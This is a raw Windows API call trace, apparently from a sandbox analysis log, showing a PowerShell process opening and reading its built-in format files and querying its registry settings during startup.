	[0469.156] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.156] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.156] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.157] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.157] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.157] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.157] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1b4, lpOverlapped=0x0) returned 1
	[0469.157] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x0, lpOverlapped=0x0) returned 1
	[0469.158] CloseHandle (hObject=0x320) returned 1
	[0469.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0469.158] SetErrorMode (uMode=0x1) returned 0x1
	[0469.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed2e0 | out: lpFileInformation=0x1ed2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0469.158] SetErrorMode (uMode=0x1) returned 0x1
	[0469.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0469.158] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed3c8 | out: phkResult=0x1ed3c8*=0x320) returned 0x0
	[0469.158] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed34c, lpData=0x0, lpcbData=0x1ed348*=0x0 | out: lpType=0x1ed34c*=0x1, lpData=0x0, lpcbData=0x1ed348*=0x56) returned 0x0
	[0469.158] CoTaskMemAlloc (cb=0x5a) returned 0x1b82f060
	[0469.158] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed31c, lpData=0x1b82f060, lpcbData=0x1ed318*=0x56 | out: lpType=0x1ed31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed318*=0x56) returned 0x0
	[0469.158] CoTaskMemFree (pv=0x1b82f060) 
	[0469.159] RegCloseKey (hKey=0x320) returned 0x0
	[0469.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0469.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0469.933] VirtualQuery (in: lpAddress=0x1ec0b0, lpBuffer=0x1ecf70, dwLength=0x30 | out: lpBuffer=0x1ecf70*(BaseAddress=0x1ec000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0469.949] VirtualQuery (in: lpAddress=0x1ec0b0, lpBuffer=0x1ecf70, dwLength=0x30 | out: lpBuffer=0x1ecf70*(BaseAddress=0x1ec000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0470.556] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0470.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.556] CoTaskMemFree (pv=0x484630) 
	[0470.570] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed568 | out: phkResult=0x1ed568*=0x320) returned 0x0
	[0470.570] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ed57c, lpData=0x0, lpcbData=0x1ed578*=0x0 | out: lpType=0x1ed57c*=0x1, lpData=0x0, lpcbData=0x1ed578*=0x74) returned 0x0
	[0470.570] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ed4ec, lpData=0x0, lpcbData=0x1ed4e8*=0x0 | out: lpType=0x1ed4ec*=0x1, lpData=0x0, lpcbData=0x1ed4e8*=0x74) returned 0x0
	[0470.570] CoTaskMemAlloc (cb=0x78) returned 0x447ef0
	[0470.570] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ed4bc, lpData=0x447ef0, lpcbData=0x1ed4b8*=0x74 | out: lpType=0x1ed4bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed4b8*=0x74) returned 0x0
	[0470.570] CoTaskMemFree (pv=0x447ef0) 
	[0470.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0470.570] SetErrorMode (uMode=0x1) returned 0x1
	[0470.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0470.571] SetErrorMode (uMode=0x1) returned 0x1
	[0470.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.572] SetErrorMode (uMode=0x1) returned 0x1
	[0470.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0470.572] SetErrorMode (uMode=0x1) returned 0x1
	[0470.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.572] SetErrorMode (uMode=0x1) returned 0x1
	[0470.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0470.572] SetErrorMode (uMode=0x1) returned 0x1
	[0470.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.572] SetErrorMode (uMode=0x1) returned 0x1
	[0470.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0470.573] SetErrorMode (uMode=0x1) returned 0x1
	[0470.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.573] SetErrorMode (uMode=0x1) returned 0x1
	[0470.573] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0470.573] SetErrorMode (uMode=0x1) returned 0x1
	[0470.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0470.573] SetErrorMode (uMode=0x1) returned 0x1
	[0470.573] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0470.573] SetErrorMode (uMode=0x1) returned 0x1
	[0470.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0470.573] SetErrorMode (uMode=0x1) returned 0x1
	[0470.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0470.574] SetErrorMode (uMode=0x1) returned 0x1
	[0470.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0470.574] SetErrorMode (uMode=0x1) returned 0x1
	[0470.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0470.574] SetErrorMode (uMode=0x1) returned 0x1
	[0470.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0470.574] SetErrorMode (uMode=0x1) returned 0x1
	[0470.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0470.574] SetErrorMode (uMode=0x1) returned 0x1
	[0470.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0470.575] SetErrorMode (uMode=0x1) returned 0x1
	[0470.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed440 | out: lpFileInformation=0x1ed440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0470.575] SetErrorMode (uMode=0x1) returned 0x1
	[0470.576] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0470.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.576] CoTaskMemFree (pv=0x484630) 
	[0470.633] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0470.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.634] CoTaskMemFree (pv=0x484630) 
	[0470.634] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0470.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.634] CoTaskMemFree (pv=0x484630) 
	[0470.634] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0470.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.634] CoTaskMemFree (pv=0x484630) 
	[0470.635] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0470.635] GetFileType (hFile=0x2f8) returned 0x1
	[0470.635] SetErrorMode (uMode=0x1) returned 0x1
	[0470.635] GetFileType (hFile=0x2f8) returned 0x1
	[0470.635] ReadFile (in: hFile=0x2f8, lpBuffer=0x34acce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34acce0*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.635] ReadFile (in: hFile=0x2f8, lpBuffer=0x34acce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34acce0*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x34acce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34acce0*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x34acce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34acce0*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x34acce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34acce0*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x34acce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34acce0*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x34acce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34acce0*, lpNumberOfBytesRead=0x1ed0d8*=0x9e2, lpOverlapped=0x0) returned 1
	[0470.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x34ac22a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34ac22a*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0470.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x34acce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34acce0*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0470.637] CloseHandle (hObject=0x2f8) returned 1
	[0470.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.637] SetErrorMode (uMode=0x1) returned 0x1
	[0470.637] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0470.637] SetErrorMode (uMode=0x1) returned 0x1
	[0470.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.637] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x2f8) returned 0x0
	[0470.637] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0470.637] CoTaskMemAlloc (cb=0x5a) returned 0x1b82f140
	[0470.637] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x1b82f140, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0470.637] CoTaskMemFree (pv=0x1b82f140) 
	[0470.638] RegCloseKey (hKey=0x2f8) returned 0x0
	[0470.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.938] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x6c3b3e65, Data2=0x2720, Data3=0x4b41, Data4=([0]=0xac, [1]=0x2, [2]=0xa7, [3]=0x7, [4]=0xbe, [5]=0x7, [6]=0x14, [7]=0x95))) returned 0x0
	[0470.953] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xe705a946, Data2=0x422f, Data3=0x40cd, Data4=([0]=0xa0, [1]=0x3b, [2]=0x50, [3]=0xf7, [4]=0xd9, [5]=0xc2, [6]=0x9c, [7]=0xa7))) returned 0x0
	[0470.955] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0470.955] GetFileType (hFile=0x2f8) returned 0x1
	[0470.955] SetErrorMode (uMode=0x1) returned 0x1
	[0470.955] GetFileType (hFile=0x2f8) returned 0x1
	[0470.955] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d7848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34d7848*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d7848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34d7848*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
